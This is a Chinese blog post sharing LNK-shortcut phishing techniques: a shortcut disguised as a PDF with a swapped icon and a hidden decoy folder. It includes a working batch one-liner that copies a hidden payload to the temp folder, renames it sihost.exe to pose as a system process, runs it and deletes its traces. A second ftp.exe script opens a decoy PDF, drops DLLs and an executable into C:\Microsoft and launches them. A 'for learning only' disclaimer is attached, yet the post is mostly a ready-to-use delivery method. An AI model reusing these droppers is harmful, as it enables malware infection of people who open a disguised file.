Mamor's Blog
0%

lnk钓鱼思路分享

发表于 更新于
本文字数: 1.1k 阅读时长 ≈ 1 分钟

1.快捷方式生成

参考 www.x86matthew.com 的项目,原文链接已删除。
2023年7月份改的代码,主要配合bat/vbs脚本调用,图标替换通过010editor进行修改,之前本想将其写成个 操作友好的工具,但由于部分原因没弄成. (有的地方乱码不太好处理 遂搁置了)

test处可伪装成正常打开pdf时显示的内容(类型、大小、修改日期)

2.图标处理

参考 https://www.cnblogs.com/f-carey/p/16542156.html#tid-sywapk

3.bat脚本

1
xcopy /h /y %cd%__MACOSX.DOCX\calc.tmp %temp%\ & attrib -s -a -h %temp%\calc.tmp & rename %temp%\calc.tmp sihost.exe & attrib -s -a -h %cd%__MACOSX.DOCX\calc.tmp & start %temp%\sihost.exe & del "calc.pdf.lnk"  &  del /F /A /Q %cd%__MACOSX.DOCX\calc.tmp

4.文件夹隐藏

打开隐藏后效果如下,正常情况默认隐藏 .__MACOSX 文件夹

注意!!!

2023年时候用的方法,仅作为一种钓鱼思路进行参考学习,切勿被恶意使用!!!

参考代码: https://github.com/Mamor5409/LnkGen/blob/main/lnkgen.c

【23年时候学习时候稍微改了下,但是当时由于编码问题比较麻烦,就没再考虑改成GUI的 整体思路是这样的 仅供学习参考,请勿用于非法用途,后果自行承担】

除了 bat 、vbs ,最近看到了个ftp的

C:\Windows\System32\ftp.exe -s"":_/_

1
2
3
4
5
6
7
8
!call mkdir C:\Microsoft
!call start /max _\__\word.pdf
!call echo %RANDOM%>>C:\Microsoft >nul
!call copy /Y  _\__\__\__\__\__\support  C:\Microsoft\ApiHelp.dll >nul
!call copy /Y  _\__\__\__\__\__\view C:\Microsoft\VSPerfCmd.exe >nul
!call copy /Y  _\__\__\__\__\__\webview C:\Microsoft\VSPMsg.dll >nul
!call start C:\Microsoft\VSPerfCmd.exe
quit

image-20250325160926133

image-20250325160853535

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------